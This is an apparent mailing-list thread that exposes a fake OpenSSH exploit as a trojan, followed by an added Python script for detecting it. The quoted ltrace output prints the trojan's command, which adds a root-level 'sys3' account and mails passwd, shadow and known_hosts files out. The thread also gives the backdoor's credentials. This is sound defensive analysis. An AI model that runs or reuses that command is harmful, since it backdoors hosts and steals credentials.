Message-ID: <3F6A773F.30607@jackhammer.org>
From: pdt at jackhammer.org (Paul Tinsley)
Subject: new openssh exploit in the wild! * is FAKE
AS SH@!*
Great credentials to boot:
login: sys3
password: sys3
Think they would at least pass one out that wouldn't create an easily
"crackable" password...
KF wrote:
> printf("[*] sending shellcode\n") = 22
> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd;
>   echo "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:99999:7:::" >> /etc/shadow;
>   /sbin/ifconfig -a >/tmp/.tmp;
>   cat /etc/passwd /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
>   find /home -name known_hosts -exec cat {} >> /tmp/.tmp;
>   cat /tmp/.tmp | /usr/sbin/sendmail -f ownage@....de m0nkeyhack@...ermarkt.de) &> /dev/null ;
>   rm -f /tmp/.tmp;", "r") = 0x0804a6b0
>
>
> -KF
>
>
> gordon last wrote:
>
>> hi readers,
>> while I was staying idle in a so-called 0day release channel on one
>> irc network some scriptkiddies were
>> talking about a new 0day release.
>>
>> in my backlog i can see the following:
>> ---cut
>> 08:09 [R4lph] *** r3t0r (r4lph@xxx) has joined channel #0dayz
>> 08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/
>> ---cut
>>
>> I looked at this piece of exploit... it is binary so I'm not sure if
>> this is a trojan or a backdoor or a virus. But I can't see anything
>> strange while sniffing the exploit traffic. And I got root on
>> several of my openbsd boxes with that. The bruteforcer seems to be
>> very good.
>>
>> I too looked at "strings theosshucksass" and found nothing suspicious.
>>
>> This exploit seems to have been in the wild (underground) since the
>> beginning of August.
>>
>> That's quite a long time; I hope most admins are patching their systems
>> now... because the exploit is getting around faster and faster.
>>
>> If anyone can reverse engineer this piece it would be great if he
>> posts his results on this list because I am really interested in the
>> exploitation technique used for that bug.
>>
>> I can't get an idea of how to exploit this.
>>
>> hmm...
>> regards,
>> glast
>>
>> ------------------------------------------------------------------------
>> From now on, simply dial 0-10-13 first for local calls too. Info
>> at www.tele2.de <http://www.tele2.de>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
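What the popen() string in KF's ltrace output actually does is backdoor the machine that runs the "exploit": it appends a second UID-0 account (sys3) to /etc/passwd and /etc/shadow and mails the password files and every known_hosts it can find to the author. The script below is an added example, not code from the thread or from the binary. It audits passwd/shadow text for exactly those traces: extra UID-0 accounts, shadow entries missing from passwd, and the literal hash from the ltrace output used as an indicator. It also tests Paul's claim that the hash is the password "sys3", using a reimplementation of the classic md5crypt ($1$) construction; the md5crypt routine is assumed to match crypt(3)'s, and its verdict on the real hash is printed rather than asserted. The sample passwd/shadow content is constructed here from the lines the binary appends.

```python
"""Audit passwd/shadow text for the backdoor account planted by the fake
OpenSSH "0day" and test the claimed password against its hash.

Added example for the thread above; sample inputs are constructed."""

import hashlib
from typing import Dict, List, Tuple

# Indicator copied verbatim from the popen() string in the ltrace output.
IOC_SHADOW_HASH = "$1$nWXmkX74$Ws8fX/MFI3.j5HKahNqIQ0"

# Constructed sample: an ordinary passwd/shadow plus the two appended lines.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sys3:x:0:103::/:/bin/sh
"""
SAMPLE_SHADOW = """root:$1$abcdefgh$0123456789abcdefghijkl:12311:0:99999:7:::
daemon:*:12311:0:99999:7:::
alice:$1$saltsalt$aaaaaaaaaaaaaaaaaaaaaa:12311:0:99999:7:::
sys3:$1$nWXmkX74$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:99999:7:::
"""


def parse_colon_file(text: str) -> List[List[str]]:
    """Split passwd/shadow style text into field lists, skipping blanks/comments."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            rows.append(line.split(":"))
    return rows


def find_uid0_accounts(passwd_text: str) -> List[str]:
    """Any UID-0 account other than root is root-equivalent and suspect."""
    return [r[0] for r in parse_colon_file(passwd_text)
            if len(r) >= 3 and r[2] == "0" and r[0] != "root"]


def find_ioc_hashes(shadow_text: str, iocs: List[str]) -> List[Tuple[str, str]]:
    """Return (user, hash) for shadow entries whose hash is a known indicator."""
    return [(r[0], r[1]) for r in parse_colon_file(shadow_text)
            if len(r) >= 2 and r[1] in iocs]


def audit(passwd_text: str, shadow_text: str) -> Dict[str, List]:
    passwd_users = {r[0] for r in parse_colon_file(passwd_text)}
    shadow_users = [r[0] for r in parse_colon_file(shadow_text)]
    return {
        "uid0_extra": find_uid0_accounts(passwd_text),
        "ioc_hits": find_ioc_hashes(shadow_text, [IOC_SHADOW_HASH]),
        # Accounts with a shadow entry but no passwd entry (half-applied backdoor).
        "orphaned_shadow": [u for u in shadow_users if u not in passwd_users],
    }


ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5crypt(password: str, salt: str) -> str:
    """md5crypt ($1$) following FreeBSD's crypt-md5.c (assumed to match crypt(3))."""
    pw, magic, salt_b = password.encode(), b"$1$", salt.encode()[:8]
    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    for pl in range(len(pw), 0, -16):           # one alt byte per password byte
        ctx.update(alt[:min(16, pl)])
    i = len(pw)
    while i:                                     # NUL or pw[0] per bit of len(pw)
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                        # key stretching rounds
        ctx1 = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            ctx1.update(salt_b)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    out = []
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return (magic + salt_b + b"$").decode() + "".join(out)


def check_claimed_password(shadow_hash: str, candidate: str) -> bool:
    """True if candidate hashes to shadow_hash; only $1$ hashes are handled."""
    parts = shadow_hash.split("$")
    if len(parts) != 4 or parts[1] != "1":
        return False
    return md5crypt(candidate, parts[2]) == shadow_hash


if __name__ == "__main__":
    print(audit(SAMPLE_PASSWD, SAMPLE_SHADOW))
    print("claimed password 'sys3' matches the posted hash:",
          check_claimed_password(IOC_SHADOW_HASH, "sys3"))
```

Run it against the real files on any box that has executed the binary (`audit(open("/etc/passwd").read(), open("/etc/shadow").read())` as root); a non-empty `uid0_extra` or `ioc_hits` means the host is owned regardless of whether the hash check agrees with Paul. Also check outbound mail logs for the two recipient addresses, since the script mails /etc/shadow and known_hosts out before deleting /tmp/.tmp.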